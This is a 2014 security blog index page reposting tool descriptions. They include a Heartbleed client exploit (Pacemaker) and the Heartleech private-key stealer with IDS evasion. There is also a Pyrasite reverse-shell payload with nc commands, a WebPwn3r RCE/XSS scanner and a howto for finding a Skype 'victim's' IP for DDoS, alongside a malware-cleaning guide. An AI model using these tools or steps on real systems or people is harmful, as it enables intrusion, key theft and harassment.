CVE Feeds

Apr 16, 2014

Tools: Pacemaker - Heartbleed (CVE-2014-0160) client exploit

How does it work?

TLS heartbeats can be sent by either side of a TLS connection. After the handshake completes, these heartbeats are encrypted. But apparently OpenSSL allows heartbeat messages before the handshake is completed. These heartbeats (on top of the record layer) are not encrypted at all!
This makes it very easy to exploit the bug on clients:
  1. Wait for a ClientHello containing a TLS version and cipher suite.
  2. Send a ServerHello containing the same TLS version and cipher suite (to prevent handshake failure).
  3. At this point, the server can send as many heartbeat requests as it likes.
Note that there is no need for any certificates as the heartbeats are accepted before any certificate or encryption keys are exchanged. As the length of the heartbeat requests are unchecked, up to 64 kiB memory can be read from client memory.
pacemaker performs the above steps and assumes a client not to be vulnerable if step 3 results in data other than Alerts. If needed for some protocols (SMTP with STARTTLS for example), additional data is exchanged before the TLS handshake starts.

Example: 
Run the server:
python pacemaker.py
In your client, open https://localhost:4433/ (replace the hostname if needed). For example:
curl https://localhost:4433/
The client will always fail to connect:
curl: (35) Unknown SSL protocol error in connection to localhost:4433
If you are not vulnerable, the server outputs something like:
Connection from: 127.0.0.1:40736
Possibly not vulnerable
If you are vulnerable, you will see something like:
Connection from: 127.0.0.1:40738
Client returned 65535 (0xffff) bytes
0000: 18 03 03 40 00 02 ff ff 2d 03 03 52 34 c6 6d 86  ...@....-..R4.m.
0010: 8d e8 40 97 da ee 7e 21 c4 1d 2e 9f e9 60 5f 05  ..@...~!.....`_.
0020: b0 ce af 7e b7 95 8c 33 42 3f d5 00 c0 30 00 00  ...~...3B?...0..
0030: 05 00 0f 00 01 01 00 00 00 00 00 00 00 00 00 00  ................
0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
*
4000: 00 00 00 00 00 18 03 03 40 00 00 00 00 00 00 00  ........@.......
8000: 00 00 00 00 00 00 00 00 00 00 18 03 03 40 00 00  .............@..
...
e440: 1d 2e 9f e9 60 5f 05 b0 ce af 7e b7 95 8c 33 42  ....`_....~...3B
e450: 3f d5 00 c0 30 00 00 05 00 0f 00 01 01 00 00 00  ?...0...........
fff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ...............
Subsequent lines full of NUL bytes are folded into one with an * thereafter (like the xxd tool).
An example where more "interesting" memory gets leaked using wget -O /dev/null https://google.com https://localhost:4433:


Source: https://github.com/Lekensteyn/pacemaker


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Malware Analysis with Sysinternals tool

Malware Cleaning Steps
1. Disconnect Network.

2. Identify malicious process and drivers
 - Using "Process Explorer"
   -- Verify signature with double click and click verify for checking image vertification(Can show verify column with right click at each column name -> select column -> verify signer)
   -- Checking strings tab and look it with memory view
   -- Ctrl + D for list dlls that loaded by Process.
   -- When you open the program, you can find some idiot malware that don't have "description", "Company Name", "Unverify signer". 
   -- Hilight Color Of Process Explorer
      --- Blue processes are running in the same secuirty context as Process Explorer
      --- Pink processes host windows services
      --- Purple processes is "packed" => Compressed or encrypted
      --- Green processes for new processes. (Can change duration of process with Options
    
 -  Using "Sigcheck" for scan system for suspicious executable images(must connect to internet)
   -- sigcheck -e -u -s C:\
   -- sigcheck -e -u * 
 - Using "ListDlls" for scan running process for unsigned DLLs
   -- listdlls -u

3. Terminates identified processes
 - Suspend the process. After that, kill it.

4. Identify and delete malware autostarts
 - msconfig -> Startup tab. (Old trick)
 - Using "Autoruns" program for list autorun program and disable the malicious program startup.
 - Tracing Malware with "Process Monitor"
  -- Normally, the system doesn't always write the reg. If the system was infected, your system will have multiple write activity. You can filter write category with "Filter -> Categories -> Write"
  -- Process Tree function that is the same of Process Explorer ( "Tools" -> "Process Tree") but can find the malicious process with suspicious lifetime.
  -- Enable Boot Logging for install driver and capture the shutdown and capture the startup.
*** RunOnce Key was used for run every time when user log in. 

5. Delete malware files
 - Boot in safe mode and delete the files.

6. Reboot and repeat





If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Pyrasite - Inject arbitrary code into a running Python process

usage: pyrasite [-h] [--gdb-prefix GDB_PREFIX] [--verbose] pid [filename]

pyrasite - inject code into a running python process

positional arguments:
  pid                   The ID of the process to inject code into
  filename              The second argument must be a filename

optional arguments:
  -h, --help            show this help message and exit
  --gdb-prefix GDB_PREFIX
                        GDB prefix (if specified during installation)
  --verbose             Verbose mode

For updates, visit https://github.com/lmacken/pyrasite
 

Reverse Python Shell

Deprecated since version 2.0: Use the pyrasite-shell instead
This lets you easily introspect or alter any objects in your running process.
import sys
import pyrasite

class ReversePythonShell(pyrasite.ReversePythonConnection):
    port = 9001
    reliable = False

    def on_connect(self):
        self.send("Python %s\nType 'quit' to exit\n>>> " % sys.version)

ReversePythonShell().start()
$ python
>>> x = 'foo'
$ pyrasite <PID> pyrasite/payloads/reverse_python_shell.py
$ nc -l 9001
Python 2.7.1 (r271:86832, Apr 12 2011, 16:15:16)
[GCC 4.6.0 20110331 (Red Hat 4.6.0-2)]
>>> print x
foo
>>> globals()['x'] = 'bar'
 

 Source: http://pyrasite.readthedocs.org/en/latest/CLI.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

News: iPhone iOS Bug For Flash SMS(Class 0 SMS) (Works on iOS 7.0.4 and fix in 7.1)

iPhone iOS Bug caused by class 0 (Flash) SMS, Class 0 SMS, or Flash SMS, is a type of message defined in the GSM specification that gets displayed directly on the phone's screen and doesn't automatically get stored on the device. After reading such a message, users have the option to save it or dismiss it.

The bug has been tested by the expert on various devices running iOS versions prior to 7.1.

The expert has told Softpedia that he believes that the issue is most likely related to how layers created by Flash SMS messages are handled.

When such a message is received, it covers the entire screen. Let’s assume that this message is not dismissed and the device enters sleep mode. If another Flash SMS is received after the phone has entered sleep mode, the lock screen becomes unresponsive when the user tries to unlock it.

The only way to unlock the screen is by rebooting it, or by calling the phone from another device. After the call has ended, the lock screen becomes responsive again.

While this might not seem like a big deal, the bug could be leveraged by cybercriminals in a clever way.

“The attack scenario is indeed a little bit complicated, due to the 2 steps attack: first send a message while phone is awake, then send another one while it is in sleep mode,” Alecu told Softpedia.

“However, one way to attack would be in order to get some financial benefits, just like with ransomware, by asking for money in the body of the class 0 message,” he added.

“Since this type of message does not display the sender number, it makes it even easier to hide your identity, so the attacker could for example send a flash message text saying ‘Call 0900 (premium rate) number if you want your device to be unlocked!’” 

 
video


Source: http://vimeo.com/83494201


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: WebPwn3r - Web Applications Security Scanner For Remote Code/Command Execution & XSS

WebPwn3r is a Web Applications Security Scanner coded in Python to help Security Researchers to scan Multiple links in the same time against Remote Code/Command Execution & XSS Vulnerabilities.
You can extract the URL’s from Burp Suite and save it in list.txt then pass it to WebPwn3r.
You can also use your own crowler to gather URL’s for a certain domain or a random domains, and save it in list.txt then pass it to WebPwn3r.
In it’s Public Demo version, WebPwn3r got below Features:
1- Scan a URL or List of URL’s
2- Detect and Exploit Remote Code  Injection Vulnerabilities.
3- ~ ~ ~ Remote Command  Execution Vulnerabilities.
4- ~ ~ ~ Typical XSS Vulnerabilities.
5- Detect WebKnight WAF.
6- Improved Payloads to bypass Security Filters/WAF’s.
7- Finger-Print the backend Technologies.



Source: http://www.sec-down.com/wordpress/?p=373



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Apr 15, 2014

Tools: Ballast - Balancing Load Across Systems (Ballast)

Ballast is a tool for balancing user load across SSH servers based on configurable criteria such as CPU load and system availability. Ballast is invoked as part of the SSH login process, hence has access to the user name, which is not available in traditional load balancers. This gives ballast the unique ability to perform user-specific load balancing, which has several benefits including separating users who have historically generated high loads and providing a common login interface to users who may be separated based on other criteria such as system accessibility. Ballast includes a simple client, a lightweight data server, and a data collection agent.

Source: http://code.nasa.gov/project/balancing-load-across-systems-ballast/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Heartleech - Hearbleed attack tool

heartleech

A typical "heartbleed" tool. What makes this different is:

  • autopwn most (-a) that does all the steps neeeded to get private key
  • post-handshake (encrypted) heartbeats instead of during handshake
  • evades Snort IDS rules
  • loops making repeated requests (-l <loopcount>)
  • dumps binary data to file (-f <filename>)
  • IPv4 or IPv6 (-v <IPver>)
  • full 64k heartbleeds
Once the program gets a key and exits, you can prove to the world that you got the private key by using it to encrypt a message the public can verify:

echo "@ErrataRob got your key" | openssl rsautl -sign -inkey cloudflare.privkey | openssl enc -base64 -out msg.signed
 
To verify this message, you first need to get the public key. One way of doing this is with the following command:

echo "hello" | openssl s_client -showcerts -connect www.cloudflarechallenge.com:443 | openssl x509 >cloudflare.cert

Then, you use this certificate to decrypt (and verify) the message:

openssl enc -d -base64 -in msg.signed | openssl rsautl -verify -certin -inkey cloudflare.cert

If you do this, you get back the message:

"@ErrataRob got your key"

This verifies that I indeed have the key.

 
Source: https://github.com/robertdavidgraham/heartleech



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Find IP of Skype users

Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.

If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P.

netstat -tupan | grep skype > n1

Now chat with your victim; as soon as you got reply use following command.

netstat -tupan | grep skype > n2

diff n1 n2

Now we have IP. of victim.

In most situation our victim is not in our friend-list. So for that situation, we will going to use online skype resolver.

Use one of following  links to get I.P. of your victim using his skype user-name.

(1)http://www.skyperesolver.com/

(2)http://www.resolveme.org/ 

(3)http://www.speedresolve.com/resolve.php

(4)http://skypegrab.com/skype-beta

(5)http://iskyperesolve.com/ 



Source: http://tipstrickshack.blogspot.com/2013/10/fun-with-skype-resolver.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Apache-scalp - Apache log analyzer for security

Scalp! is a log analyzer for the Apache web server that aims to look for security problems. The main idea is to look through huge log files and extract the possible attacks that have been sent through HTTP/GET (By default, Apache does not log the HTTP/POST variable).

How it works

Scalp is basically using the regular expression from the PHP-IDS project and matches the lines from the Apache access log file. These regexp has been chosen because of their quality and the top activity of the team maintaining that project.
You will then need this file https://dev.itratos.de/projects/php-ids/repository/raw/trunk/lib/IDS/default_filter.xml in order to run Scalp.
Scalp started as a simple python script which is still maintained, but I plan to focus my effort on the binary version (written in C++) for efficiency when it comes to scalp huge log files.

Usage

Scalp has a couple of options that may be useful in order to save time when scalping a huge log file or in order to perform a full examination; the default options are almost okay for log files of hundreds of MB. 

Source: http://code.google.com/p/apache-scalp/



 my blog, Please Donate Me
Or Click The Banner For Support Me.

Videos: PyCon US 2014

PyCon is the largest annual gathering for the community using and developing the open-source Python programming language. It is produced and underwritten by the Python Software Foundation, the 501(c)(3) nonprofit organization dedicated to advancing and promoting Python. Through PyCon, the PSF advances its mission of growing the international community of Python programmers.
Because PyCon is backed by the non-profit PSF, we keep registration costs much lower than comparable technology conferences so that PyCon remains accessible to the widest group possible. The PSF also pays for the ongoing development of the software that runs PyCon and makes it available under a liberal open source license.

Source: http://pyvideo.org/category/50/pycon-us-2014



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |